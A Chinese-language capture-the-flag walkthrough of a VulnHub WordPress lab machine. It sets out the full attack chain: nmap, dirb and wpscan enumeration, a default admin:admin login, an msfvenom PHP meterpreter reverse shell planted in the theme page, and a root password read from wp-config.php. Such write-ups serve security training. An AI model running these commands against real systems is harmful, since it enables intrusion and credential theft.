download:
https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova
环境部署:
1.下载后先进行对mac地址的扫描发现
nmap -sP 172.16.10.0/24
信息收集
首先使用nmap扫描工具进行对开放端口的扫描
nmap -sV -n -p- 172.16.10.181
开放端口:
22 53 80 110 139 143 445 993 995
web
先去查看80端口
发现是一张图片
使用ctrl+u查看源码,没有注释信息,就是一张图片
接着使用dirb对网站目录进行探测
dirb http://172.16.10.182
主要是这几个目录,发现有wordpress目录
那就使用wpscan工具
先对扫描网站的用户
wpscan --url "http://172.16.10.182/wordpress" --enumerate u
用户:admin、wpuser
因为看到有admin管理员用户,那就先用弱口令(admin)尝试进行登录
用户名:admin
密码:admin
登录成功
反弹shell
进入编辑模块,可以直接对网站的主页进行修改,更改为反弹shell,再次进行访问主页时,kail中的exploit/multi/handler
模块进行监听就可以得到shell
*生成反弹shell*
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o shell.php
将主页内容进行修改,记得更新
在kail中开启监听,监听的ip和端口要和在生成反弹shell时的一致
拿到shell
获取root密码
因为拿到shell的权限只是www-data权限,需要拿到靶机的最高权限root
使用python语句进入交互式
python -c 'import pty;pty.spawn("/bin/bash")'
查看当前目录下的文件,发现有wp-config.php文件,直接进行查看
发现了用户名和密码
root:rootpassword!
直接su root,尝试切换root用户
成功
获得flag
find / -name flag.txt
1.root用户根目录下的flag
2.wpadmin用户根目录下的flag
重点补充
wp-config.php文件是wordpress建站的配置文件,里面有wordpress的数据库信息,语言信息。所以会存在一些配置信息的泄露。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论